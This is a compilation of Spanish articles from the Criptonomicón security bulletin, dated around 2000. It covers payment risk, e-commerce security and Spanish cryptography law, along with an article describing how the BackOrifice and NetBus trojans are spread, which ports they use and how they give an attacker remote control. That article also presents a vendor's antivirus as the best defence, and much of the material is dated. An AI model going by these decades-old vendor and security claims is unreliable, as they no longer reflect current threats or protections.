clculo y el nmero de datos enviados a este ltimo.
Gestin del riesgo y autorizacin
Otro aspecto muy importante a la hora de autorizar o no un pago es realizar
una estimacin del riesgo que supondra autorizar un pago fraudulento. Para
ello, todos los agentes que intervienen en el momento de realizarse la
transaccin realizan un anlisis de la situacin en la que la transaccin se
produce con el fin de autorizar el pago o no. En este caso tenemos dos

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos30.html (4 of 6) [25/10/2000 02:31:08 p.m.]

Seguridad en los nuevos medios de pago

situaciones bien distintas, segn la autorizacin se realice directamente por


el banco emisor tras una conexin en lnea con el comercio, o se realice por
otro agente y sin conexin con el banco emisor (fuera de lnea).
En el caso de autorizaciones en lnea, el banco emisor puede verificar
directamente la autenticidad del cliente (por ejemplo, mediante una
verificacin del PIN en los sistemas actuales de retirada de dinero con tarjeta
en cajeros automticos) y puede consultar los datos de ste (listas negras,
saldo disponible, lmites establecidos, etc.) para autorizar el pago o no.
En el caso de autorizaciones fuera de lnea, no se conoce exactamente la
situacin financiera del cliente, por lo que se tiene que realizar una
estimacin del riesgo basada en el anlisis de algunos parmetros como por
ejemplo, el importe de la transaccin, la procedencia (nacional, comunitaria,
extranjera) del cliente, consultar listas negras actualizadas peridicamente
por las diferentes entidades bancarias emisoras, etc. Normalmente este tipo
de autorizaciones resultan mucho ms econmicas debido al ahorro en la
llamada telefnica solicitando la autorizacin, pero conllevan un mayor
riesgo y exigen por tanto unos protocolos criptogrficos ms robustos que
permitan al comercio autenticar al cliente sin necesidad de consultar a su
banco.
Disponibilidad y fiabilidad
Todas las partes implicadas en un sistema electrnico de pago requieren la
habilidad para realizar o recibir pagos cuando sea necesario. Por otro lado,
las transacciones deben ser atmicas, en el sentido de que o se producen
satisfactoriamente o no se producen, pero no pueden quedar en un estado
desconocido o inconsistente. Ningn cliente o comercio aceptara una
prdida de dinero por culpa de un error en el sistema. La disponibilidad y la
fiabilidad del sistema dependen de la disponibilidad y fiabilidad de los
dispositivos y de las redes sobre las que se sustenta. La recuperacin ante
fallos requiere un sistema de almacenamiento estable en todas las partes del
sistema y protocolos especficos de sincronismo.
Publicado en el Boletn del Criptonomicn #30.
Antonio Valverde Garca pertenece al Departamento de Tarjeta Inteligente de SERMEPA
y es experto en medios de pago electrnicos y seguridad en entornos bancarios.

Informacin adicional

Especificaciones de Visa Internacional para transacciones de pago con tarjetas


inteligentes de crdito y dbito

Especificaciones de Visa y Mastercard para comercio electrnico utilizando


tarjetas de crdito y dbito (SET)

Especificaciones del comit europeo de estandarizacin bancaria para


monedero electrnico europeo

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos30.html (5 of 6) [25/10/2000 02:31:08 p.m.]

Seguridad en los nuevos medios de pago

Agencia de Certificacin Electrnica formada por Telefnica, SERMEPA,


Sistema 4B y CECA para la gestin de certificados de comercio electrnico

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos30.html (6 of 6) [25/10/2000 02:31:08 p.m.]

La amenaza de los ltimos caballos de Troya

Comercio electrnico

Criptologa y seguridad

La amenaza de los ltimos caballos de Troya

Cuestiones legales

Por Pedro Bustamante

Intimidad y privacidad

LOS VIRUS

Virus

Hoy en da las incidencias de programas malignos nuevos que aparecen por


Internet crece a un ritmo impresionante. De estos programas existen dos
variantes: virus y caballos de Troya.
Los virus no son mas que programas que, por definicin, se copian o
replican a s mismos al ser cargados, sin intervencin necesaria por parte del
usuario. Para poder activarse necesitan ser ejecutados o cargados por el
sistema operativo. sta es la razn por la que los virus nicamente
contagian a los archivos ejecutables. Todo esto cambia con los virus ms
conocidos y que ms circulan hoy por hoy; los virus de macro.
LOS CABALLOS DE TROYA
A diferencia de los virus, los caballos de Troya o troyanos estn diseados
para obtener informacin privilegiada del ordenador donde son ejecutados.
As pues existen troyanos que nicamente consiguen contraseas, otros que
graban secuencias metidas en el teclado, otros que abren puertas traseras al
ordenador, etc.
Los ms conocidos ltimamente son el BackOrifice y el NetBus. Ambos son
troyanos que abren una puerta trasera a un equipo basado en Windows 95,
Windows 98 o Windows NT.
El BackOrifice, creado por "Cult of the Dead Cow", es un programa
cliente/servidor para Win95/98. Al ser ejecutada la porcin del servidor en
una mquina Win95/98, sta se cargar en memoria y har referencia a s
misma en el registro, asegurndose que se cargar cada vez que Windows
se cargue. La porcin del servidor es configurable a travs del cliente, pero
por defecto se instala como .exe ("espacio".exe), sin clave de acceso, y
abriendo la comunicacin para que los clientes se conecten a l a travs del
puerto UDP 31337. La comunicacin entre el BackOrifice Client/Server es
cifrada, aunque ha habido informes de grupos que han conseguido romper el

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos28.html (1 of 3) [25/10/2000 02:31:09 p.m.]

La amenaza de los ltimos caballos de Troya

esquema de cifrado utilizado.


Lo nico que un hacker tiene que hacer para obtener control total de la
mquina de un usuario es mandarle, a travs de un e-mail attachment, por
ejemplo, un fichero servidor del BackOrifice. Una vez el usuario haya
ejecutado este fichero, el hacker nicamente tiene que conocer la direccin
IP del usuario para poder conectarse a dicha mquina. Una vez conectado,
el hacker puede obtener contraseas, bajarse ficheros, subir otros troyanos,
etc. El Cult of the Dead Cow indica que se puede tener ms control de una
maquina Win95/98 remotamente desde un cliente BackOrifice que sentado
en frente de la mquina fisicamente!
Existen en circulacin varios programas cuyo supuesto propsito es proteger
a usuarios del BackOrifice, pero que en realidad no es as. Uno de ellos,
llamado BOSniffer (BOSniffer.zip) pretende ser un programa que protege las
partes del registry que el BackOrifice escribe, pero en realidad no es ms
que un BackOrifice server. Existe otro, llamado IPSpoof (theipsoof.zip) que
prentende ser una utilidad para hackers que ayuda a esconder la direccin
IP del "supuesto" hacker, as pudiendo meterse en sitios del web sin poder
ser identificado. Este fichero tambin contiene un servidor BackOrifice.
El otro troyano, conocido como NetBus, es bastante similar el BackOrifice,
pero introduce otro peligro: tambin funciona bajo Windows NT. Al igual que
el BackOrifice, el NetBus se trata de un programa cliente/servidor. El
servidor por defecto escucha en el puerto 12345 UDP.
Al igual que el BackOrifice, el servidor NetBus tambin se est repartiendo
por Internet bajo otro nombre. En este caso se esta distribuyendo como
WHACKAMOLE.EXE, un juego que en realidad lleva escondido el servidor
NetBus. Al ejecutar la instalacin del juego, el programa de instalacin
tambin instalar el servidor NetBus.
METODOS DE PROTECCION
Dada la facilidad de expansin de estos tipos de virus y troyanos mediante el
correo electrnico, es recomendable contar con un antivirus con capacidad
de analizar el correo electrnico en el mismo momento de su recepcin y
antes siquiera de que sea abierto.
Hay que tener en cuenta que incluso los cortafuegos (firewalls) ms
avanzados de hoy en da pueden ser ineficaces contra este tipo de troyanos,
ya que el hacker puede configurar el troyano servidor a escuchar bajo
cualquier puerto, de tal manera que el trfico troyano <--> cliente pasara
totalmente desapercibido al administrador del firewall. Aparte, la
comunicacin se hace a travs de UDP, que es la porcin de TCP/IP que no
necesita establecer conexiones para poder mandar y recibir paquetes IP.
La mejor proteccin contra este tipo de programas malignos en la actualidad
es Panda Antivirus Platinum, ya que cuenta con tres tipos de escneres en

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos28.html (2 of 3) [25/10/2000 02:31:09 p.m.]

La amenaza de los ltimos caballos de Troya

uno: * Panda Antivirus (escanea discos y memoria) * Modulo de Proteccin


Permanente de E-Mail * Modulo de Proteccin Permanente de Internet
Gracias a estos mdulos, Panda Antivirus consigue detectar y desinfectar
con la mayor eficacia virus y troyanos transmitidos a travs de TCP/IP y
otros mtodos ms conocidos.
Publicado en el Boletn del Criptonomicn #28.
Pedro Bustamante trabaja en Panda Software International.

Informacin adicional

Limpiador del NetBus/Whackamole con Panda Antivirus

Cult of the Dead Cow

NT Tool Box Informacin sobre NetBus

Cmo protegerse frente a virus

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos28.html (3 of 3) [25/10/2000 02:31:09 p.m.]

Presente y futuro del comercio electrnico

Comercio electrnico

Criptologa y seguridad

Presente y futuro del comercio electrnico

Cuestiones legales

Por Miguel ngel Sarasa Lpez

Intimidad y privacidad

Hasta no hace demasiado tiempo la interaccin social a nivel comercial se

Virus

efectuaba cara a cara, por telfono o bien por correo postal. Sin embargo,
gracias a las innovaciones tcnicas acontecidas en los ltimos aos, se ha
producido el nacimiento de un nuevo tipo de comercio, el denominado
comercio electrnico.
El comercio electrnico es un servicio de la tecnologa que permite la
realizacin de operaciones de negocios y la compraventa de bienes y
servicios mediante la utilizacin de sistemas electrnicos, como por ejemplo
los ordenadores personales, hoy ya tan habituales en muchos hogares. En
definitiva, este nuevo mercado electrnico nos permite tener en nuestro
domicilio una gran galera comercial por la que podemos pasear de forma
fcil y rpida con el ratn de nuestro ordenador, y todo ello sin movernos de
casa.
El comercio electrnico no es algo totalmente nuevo, si se tiene en cuenta
que desde hace ya ms de una dcada existe un protocolo denominado EDI
(Electronic Data Interchange) para el intercambio electrnico de
documentos. Existen muchas otras variantes de comercio electrnico, como
por ejemplo el denominado home-banking, que permite al usuario realizar
operaciones en sus cuentas bancarias igualmente desde su ordenador
personal.
Todo lo anterior se hace posible gracias a la existencia de grandes redes
digitales de comunicacin a nivel mundial, que facilitan las transacciones
entre las partes implicadas. Entre ellas merece especial mencin la red
Internet, la cual da cobertura a millones de usuarios: personas, negocios,
empresas, revistas y todo tipo de sociedades.
Las ventajas del comercio electrnico son evidentes. El comprador puede
ver de manera rpida todo el escaparate electrnico y no tiene que ir tienda
por tienda en busca del producto deseado. Se optimiza tambin el tiempo de
atencin al cliente, que no tiene que esperar largas colas para ser atendido.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos25.html (1 of 4) [25/10/2000 02:31:09 p.m.]

Presente y futuro del comercio electrnico

Por su parte, el vendedor tambin se beneficia, puesto que puede ofertar sus
productos sin necesidad de mostrarlos fsicamente al comprador. Otras
ventajas del comercio electrnico son las siguientes:
1) Reduce los retrasos gracias a la velocidad de transmisin
2) Disminuye el ciclo de produccin, creando mercados ms competitivos
3) Hace posible la igualdad de trato a los clientes independientemente de
sus caractersticas individuales: nacionalidad, lugar de residencia, etc.
4) Ampla de forma considerable el mercado potencial de las empresas
5) Faculta a las pequeas y medianas empresas el acceso a mercados que
de otra manera tendran vetados por su elevado coste
Pese a todo, tambin es cierto que este tipo de comercio presenta sus
inconvenientes, algunos de ellos potencialmente peligrosos y todava por
solucionar. Entre ellos, el ms importante es la falta de seguridad en los
procesos de compraventa. En el caso del comercio tradicional, como se ha
indicado anteriormente, las mayora de transacciones se efectan cara a
cara, por telfono o por correo. Todas estas actividades pueden
considerarse intrnsecamente seguras. Sin embargo, en el caso del comercio
electrnico, la interaccin entre comprador y vendedor se realiza a travs de
una red abierta (Internet), que no puede considerarse un canal de
comunicacin seguro a menos que se adopten ciertas medidas de
proteccin.
El estudio y desarrollo de estas medidas de proteccin es precisamente uno
de los objetivos fundamentales de la criptografa. sta proporciona al
comercio electrnico las herramientas necesarias para garantizar, dado el
caso, el carcter secreto de la informacin intercambiada (confidencialidad),
as como la no manipulacin de la misma entre el origen y el destino
(integridad).
Sin embargo, el problema de la identificacin de las partes (autenticacin)
todava no est del todo resuelto. A este respecto, conviene sealar que una
de las situaciones ms preocupantes actualmente es la publicacin de los
datos personales y confidenciales del comprador (como por ejemplo el
nmero de su tarjeta de crdito) en un medio totalmente abierto como es
Internet. Otro tema pendiente de resolver es el de cmo obtener los
resguardos que permitan realizar posteriores reclamaciones tanto al
comprador como al vendedor en el caso de que alguno de ellos se sienta
perjudicado por el otro una vez concluida la transaccin.
Hoy da existen diferentes protocolos como el SET (Secure Electronic
Transaction) o el SSL (Secure Sockets Layer) que se ocupan de que este
tipo de transacciones a travs de redes informticas sean lo ms seguras
posibles. Sin embargo, ninguno de ellos ofrece todava una seguridad

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos25.html (2 of 4) [25/10/2000 02:31:09 p.m.]

Presente y futuro del comercio electrnico

completa, ya que nicamente son capaces de solucionar de forma parcial los


problemas antes apuntados, con lo que tanto el comprador como el
vendedor pueden todava engaar. As, por ejemplo, puede darse la
situacin de que el comprador pague un producto y posteriormente no lo
reciba, o bien que el vendedor entregue un producto y posteriormente no
pueda cobrarlo. Adems, lo que es ms peligroso, sin que ninguno pueda
demostrar que ha sido engaado por el otro.
Despus de todo lo dicho, es indudable que uno de los factores que ha
contribuido en mayor medida al xito y desarrollo del mundo empresarial en
los ltimos aos ha sido la implantacin del comercio electrnico. Esto hace
pensar que su protagonismo en el futuro ser incluso mayor que el que tiene
hoy en da. Es igualmente cierto que la evolucin futura de este tipo de
comercio depender de forma directa de la capacidad de garantizar su
seguridad mediante la criptografa, pero tampoco es conveniente que la
psicosis de inseguridad electrnica nos lleve a frenar el despegue de este
comercio en Internet. En definitiva, sera conveniente que empezsemos a
considerar el problema del comercio electrnico no tanto como un problema
de inseguridad sino ms bien de confianza.
Publicado en el Boletn del Criptonomicn #25.
Miguel ngel Sarasa Lpez es un criptlogo de la Universidad de Zaragoza, co-autor del
libro "Criptografa Digital, Fundamentos y Aplicaciones", editado por Prensas
Universitarias de Zaragoza en 1998.

Informacin adicional

Seguridad en el comercio electrnico: SSL o SET?

Seguridad en SSL, artculo publicado en iWorld.

SET a fondo, artculo publicado en iWorld.

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos25.html (3 of 4) [25/10/2000 02:31:09 p.m.]

Presente y futuro del comercio electrnico

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos25.html (4 of 4) [25/10/2000 02:31:09 p.m.]

Situacin legal de la criptologa en Espaa

Comercio electrnico

Criptologa y seguridad

Situacin legal de la criptologa en Espaa

Cuestiones legales

Por Jos Mara Molina

Intimidad y privacidad

La plenitud del ordenamiento jurdico exige que, adems de la proteccin "a

Virus

posteriori" sancionando conductas contrarias al mismo, disponga de


mecanismos que garanticen de forma eficaz, "a priori", en determinadas
circunstancias, las consecuencias irreparables de eventuales violaciones, lo
que se lleva a cabo a travs de lo que se conoce como medidas de
prevencin, entre las que destaca la Criptologa.
La evolucin de la importancia de la proteccin de la informacin y las
comunicaciones en la sociedad de la informacin, ha ido incrementndose y
la conveniencia inicial de proteger se ha transformando en necesidad, que
juridificada, se sita en el prtico de su reconocimiento como deber
jurdicamente exigible.
Este salto cualitativo se puede observar, en cierto modo, en la Ley 11/1.998,
de 24 de abril, General de Telecomunicaciones, que introduce una
regulacin que afecta de forma decidida al uso del cifrado, que
consideramos de extraordinario inters y supone un importante avance en la
regulacin de la Criptologa en Espaa, aunque necesitado de un profundo
desarrollo reglamentario.
De otra parte, el extraordinario avance experimentado por la tecnologa y sus
aplicaciones blicas, ha determinado que el concepto clsico de arma haya
quedado desfasado y que, por el contrario, adquieran importancia
trascendental los elementos, partes integrantes de los mismos y tecnologas
que, an no teniendo en s mismos una finalidad destructora, aumentan las
capacidades ofensiva o defensiva de un Estado y que, a la vez, tienen
aplicaciones civiles.
Estos elementos o tecnologas son los que la legislacin y la prctica
internacional denominan "materiales de doble uso".
Se podra afirmar que la Criptologa jurdicamente es una medida de
prevencin con mltiples aplicaciones basada en una tecnologa que tiene la

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos22.html (1 of 7) [25/10/2000 02:31:10 p.m.]

Situacin legal de la criptologa en Espaa

consideracin legal de tecnologa de doble uso.


Las motivaciones de la regulacin legal de la Criptologa tienen su origen,
fundamentalmente, en las dificultades que su empleo provoca en la
investigacin, persecucin y prevencin de actos delictivos en general y
especialmente la delincuencia organizada, la lucha contra el narcotrfico y el
terrorismo, siendo previsible que este efecto se incremente en el futuro, por
lo que urge articular leyes y medios tcnicos que salven esta dificultad.
El punto de partida de la normativa nacional radica en los artculos 18 y 20
de la C.E. que recogen el tratamiento constitucional de la informacin
privada y pblica respectivamente, y 55.2 del mismo cuerpo legal, referido a
la suspensin de derechos y libertades y 105 b) sobre el derecho de acceso
a registros y archivos administrativos, que configuran un marco jurdico
constitucional plenamente concordante con las disposiciones internacionales
sobre derechos fundamentales y libertades pblicas. Con independencia de
las normas sobre informacin clasificada recogidas en la Ley y Reglamento
de Secretos Oficiales, sobre los que reiteradamente se anuncia su
modificacin, las normas sobre contrabando donde se califica la criptologa
como tecnologa de doble uso, o regulaciones muy especficas como las del
Banco de Espaa, las disposiciones ms significativas que configuran el uso
general de la criptologa son las siguientes:
- Ley 11/1.998, de 24 de abril, General de Telecomunicaciones, 1 que
supone un salto cualitativo por lo que se refiere a la seguridad de las
comunicaciones. En su Exposicin de Motivos indica que se introducen
...disposiciones relativas al secreto de las comunicaciones, la proteccin de
los datos personales y el cifrado, dirigidas, todas ellas, a garantizar
tcnicamente los derechos fundamentales constitucionalmente reconocidos.
Los objetivos de la Ley son Defender los intereses de los usuario, asegurar
su derecho al acceso a los servicios de telecomunicaciones en adecuadas
condiciones de calidad, salvaguardar, en la prestacin de estos, la vigencia
de los imperativos constitucionales, en particular el de los derechos al honor,
a la intimidad y al secreto en las comunicaciones y el de la proteccin a la
juventud y a la infancia. A estos efectos, podrn imponerse obligaciones a
los prestadores de los servicios para garanta de estos derechos. (art. 3, f)
En lo referido a los servicios obligatorios de telecomunicaciones, seala que
el Gobierno, mediante norma reglamentaria, podr declarar incluidos
determinados servicios como servicios obligatorios, entre ellos, se refiere a
los servicios de tlex, los telegrficos, y aquellos otros de caractersticas
similares que comporten acreditacin de la fehaciencia del contenido del
mensaje remitido o de su remisin o recepcin, ... (art. 40.2, a)
De especial inters para esta es el Captulo III referido al secreto de las
comunicaciones y proteccin de los datos personales y derechos y
obligaciones de carcter pblico vinculado con las redes y servicios de
telecomunicaciones.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos22.html (2 of 7) [25/10/2000 02:31:10 p.m.]

Situacin legal de la criptologa en Espaa

Los operadores de telecomunicaciones y los proveedores de servicios, en la


prestacin de servicios o en la explotacin de redes de telecomunicaciones,
debern garantizar el secreto de las comunicaciones, de conformidad con el
artculo 18.3 de la Constitucin, y el cumplimiento, en su caso, de lo
establecido en el artculo 55.2 de la misma y en el artculo 579 de la Ley de
Enjuiciamiento Criminal. Para ello, debern adoptar las medidas tcnicas
que se exijan por la normativa vigente en cada momento, en funcin de las
caractersticas de la infraestructura utilizada.
Asimismo debern garantizar, en la prestacin de servicios de
telecomunicaciones, la proteccin de los datos personales, conforme a lo
dispuesto en la Ley Orgnica 5/1.992, de 29 de octubre, de Regulacin del
Tratamiento Automatizado de los Datos de Carcter personal, en las normas
dictadas en su desarrollo y en las normas reglamentarias de carcter tcnico
cuya aprobacin exija la normativa comunitaria en materia de proteccin de
los datos personales. (Artculo 50).
La Ley General de Telecomunicaciones, aborda de forma expresa, por
primera vez, el cifrado de informacin en las redes y servicios de
telecomunicaciones al decir en su artculo 52 que 1.- Cualquier tipo de
informacin que se transmita por redes de telecomunicaciones podr ser
protegida mediante procedimientos de cifrado. Podrn establecerse
condiciones para los procedimientos de cifrado en las normas de desarrollo
de esta Ley.
2.- El cifrado es un instrumento de seguridad de la informacin. Entre sus
condiciones de uso, cuando se utilice para proteger la confidencialidad de la
informacin, se podr imponer la obligacin de notificar bien a un rgano de
la Administracin General del Estado o a un organismo pblico, los
algoritmos o cualquier procedimiento de cifrado utilizado a efectos de su
control de acuerdo con la normativa vigente. Esta obligacin afectar a los
fabricantes que incorporen el cifrado a sus equipos o aparatos, a los
operadores que lo incluyan en las redes o dentro de los servicios que
ofrezcan y, en su caso, a los usuarios que lo emplean.
3.- Los operadores de redes o servicios de telecomunicaciones que utilicen
cualquier procedimiento de cifrado debern facilitar a la Administracin
General del Estado, sin coste alguno para sta y a efectos de la oportuna
inspeccin, los aparatos decodificadores que empleen, en los trminos que
se establezcan reglamentariamente.
No obstante lo dispuesto en esta Ley, una adecuada regulacin de la
proteccin criptolgica de la informacin y las comunicaciones depender de
la forma en que se elabore su desarrollo reglamentario.
- Ley Orgnica 5/1.992, de 29 de octubre, de Regulacin del Tratamiento
Automatizado de los Datos de carcter personal.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos22.html (3 of 7) [25/10/2000 02:31:10 p.m.]

Situacin legal de la criptologa en Espaa

Por lo que se refiere a la regulacin del tratamiento automatizado de los


datos de carcter personal, la regulacin de su proteccin ha ido
experimentado una evolucin orientada en una lnea de mayor concrecin.
Tanto el Convenio 108 del Consejo de Europa, de 28 de enero de 1.981, de
Proteccin de las personas en relacin con el tratamiento automatizado de
datos de carcter personal, como la Ley Orgnica 5/1.992, de 29 de octubre,
de Regulacin del Tratamiento Automatizado de Datos de carcter personal,
y la Directiva 95/46/CE del Parlamento Europeo y del Consejo , de 24 de
octubre de 1.995, relativa a la proteccin de las personas fsicas en lo que
respecta al tratamiento de datos personales y a la libre circulacin de estos
datos, se refieren a las medidas de seguridad que deben cumplir los ficheros
automatizados que contengan datos de carcter personal. Las referencias a
las medidas de seguridad en los textos indicados ha ido experimentando una
evolucin. La Ley Orgnica nmero 5/1.992, de 29 de octubre, de
Regulacin del Tratamiento Automatizado de los Datos de carcter personal,
viene a dar respuesta al mandato constitucional del artculo 18.4 de la
Constitucin, dirigido a la limitacin del uso de la informtica para garantizar
el honor, la intimidad personal y familiar de los ciudadanos y el legtimo
ejercicio de sus derechos.
La Ley, limitadora del uso de la informtica, en lo concerniente al mbito de
los "ficheros de datos" de carcter personal, considera que su existencia y
utilizacin supone un riesgo para los derechos de la personalidad y trata de
prevenir violaciones de la privacidad, derivadas del tratamiento de datos
considerados como una globalidad de procesos informticos, en cuyo marco,
la Criptologa tiene su aplicacin en hacer efectivo el mandato legal, dentro
de las medidas de seguridad y en unin de otros procedimientos.
La Ley recoge una serie de principios de proteccin de datos, pero no
recoge suficientemente los mecanismos para una proteccin efectiva. No
contempla la seguridad en la transmisin de datos, con los problemas que
implican las comunicaciones y su vulnerabilidad.
Por lo que se refriere a la seguridad de los datos El responsable del fichero
deber adoptar las medidas de ndole tcnica y organizativas necesarias que
garanticen la seguridad de los datos de carcter personal y eviten su
alteracin, prdida, tratamiento o acceso no autorizado, habida cuenta del
estado de la tecnologa, la naturaleza de los datos almacenados y los
riesgos a que estn expuestos, ya provengan de la accin humana o del
medio fsico o natural, (art. 9 LORTAD) y se remite a un desarrollo
reglamentario donde establecern los requisitos y condiciones que deban
reunir los ficheros automatizados y las personas que intervengan en el
tratamiento automatizado de los datos a que se refiere el artculo 7 de la ley.
El desarrollo reglamentario de la Ley Orgnica, llevado a efecto por Real
Decreto 1332/1.994, de 20 de junio, deja sin regular lo referido a las medidas
de seguridad con las consecuencias que ello comporta, por lo que el
desarrollo reglamentario de la Ley, en este sentido, est an pendiente de
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos22.html (4 of 7) [25/10/2000 02:31:10 p.m.]

Situacin legal de la criptologa en Espaa

realizar.

La Directiva 95/46 del Parlamento Europeo va ms lejos y no basa el


reforzamiento de las medidas de seguridad solamente en la naturaleza
especialmente protegida de los datos personales, sino que tambin tiene en
cuenta su transmisin dentro de una red. Esta Directiva requiere su
transposicin al ordenamiento jurdico espaol, lo que es recogido, en parte,
en la Ley General de Telecomunicaciones citada, cuando se refiere a los
datos de carcter personal.
La Comunidad, se ha adoptado la Directiva 97/66/CE del Parlamento
Europeo y del Consejo de 15 de diciembre de 1.997, relativa al tratamiento
de los datos personales y a la proteccin de la intimidad en el sector de las
telecomunicaciones (DOCE L 24 de 30/01/98).
Por cuanto se refiere a la seguridad, establece que: 1.- El proveedor de un
servicio pblico de telecomunicacin deber adoptar las medidas tcnicas y
de gestin adecuadas para preservar la seguridad de sus servicios, de ser
necesario en colaboracin con el proveedor de la red pblica de
telecomunicacin por lo que respecta a la seguridad de la red. Considerando
las tcnicas ms avanzadas y el coste de su aplicacin, dichas medidas
garantizarn un nivel de seguridad adecuado para el riesgo existente.
2.- En caso de que exista un riesgo concreto de violacin de la seguridad de
la red, el proveedor de un servicio pblico de telecomunicacin deber
informar a los abonados sobre dicho riesgo y sobre las posibles soluciones,
incluidos los costes necesarios,(art. 4).
En todo caso, los Estados miembros podrn adoptar medidas legales para
limitar el alcance de las obligaciones y derechos, cuando dichas limitaciones
constituyan una medida necesaria para proteger la seguridad nacional, la
defensa, la seguridad pblica, la prevencin, la investigacin, la deteccin y
la persecucin de delitos o la utilizacin no autorizada del sistema de
telecomunicacin. La Directiva establece plazos para llevara cabo las
medidas legales necesarias para su cumplimiento. -Real Decreto 263/1.996,
de 16 de febrero, por el que se regula la utilizacin de tcnicas electrnicas,
informticas y telemticas por la Administracin General del Estado, aborda
el desarrollo del artculo 45 de la Ley 30/1.992, de 26 de noviembre, de
Rgimen Jurdico de las Administraciones Pblicas y del Procedimiento
Administrativo Comn, piedra angular del proceso de incorporacin de
medios y tcnicas automatizadas en la actuacin administrativa.
Cuando se utilicen soportes, medios y aplicaciones electrnicas, informticas
y telemticas en cualquier actuacin administrativa, ...se adoptarn las
medidas tcnicas y de organizacin necesarias que aseguren la
autenticidad, confidencialidad, integridad, disponibilidad y conservacin de la
informacin. Dichas medidas de seguridad debern tener en cuenta el
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos22.html (5 of 7) [25/10/2000 02:31:10 p.m.]

Situacin legal de la criptologa en Espaa

estado de la tecnologa y ser proporcionadas a la naturaleza de los datos y


de los tratamientos y a los riesgos a los que estn expuestos. (Art. 4.2).
La transmisin o recepcin de comunicaciones entre rganos o entidades
del mbito de la administracin general del Estado o entre estos y cualquier
persona fsica o jurdica, se podrn realizar a travs de soportes, medios y
aplicaciones informticas, electrnicas y telemticas, pero siempre que se
cumplan, entre otros, los siguientes requisitos: c) La existencia de medidas
de seguridad tendentes a evitar la interceptacin y alteracin de las
comunicaciones, as como a los accesos no autorizados (Art. 7).
- La Ley 66/1.997, de 30 de diciembre de Medidas Fiscales, Administrativas
y de Orden Social, en su artculo 70, referido a la Prestacin de Servicios de
Seguridad por la Fbrica Nacional de Moneda y Timbre para las
comunicaciones a travs de tcnicas y medios electrnicos, informticos y
telemticos, en su apartado Uno dispone que ...se faculta a la Fbrica
Nacional de Moneda y Timbre (FNMT) para la prestacin de los servicios
tcnicos y administrativos necesarios para garantizar la seguridad, validez y
eficacia de la emisin y recepcin de comunicaciones y documentos a travs
de tcnicas y medios electrnicos, informticos y telemticos (EIT) en las
relaciones que se produzcan entre:
a) Los rganos de la administracin General del Estado entre s o con los
organismos pblicos vinculados o dependientes de aqulla, as como las de
estos organismos entre s.
b) Las personas fsicas y jurdicas con la Administracin General del Estado
(AGE) y los Organismos Pblicos vinculados o dependientes de ella. En su
apartado Dos se habilita en trminos similares a la FNMT para prestar estos
servicios a las Comunidades Autnomas, Entidades Locales y las Entidades
de Derechos Pblico vinculadas o dependientes de ellas, siempre que se
hayan formalizado los acuerdos o convenios procedentes.
Estos servicios se prestarn de conformidad con los requisitos tcnicos que
determine el Consejo Superior de Informtica.
Publicado en el Boletn del Criptonomicn #22 y #23.
Jos Mara Molina es abogado y ex secretario de la Junta Directiva de la Asociacin
Espaola de Criptologa.

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos22.html (6 of 7) [25/10/2000 02:31:10 p.m.]

Situacin legal de la criptologa en Espaa

envirselo por correo electrnico. No tienes ms que indicar la direccin del


destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
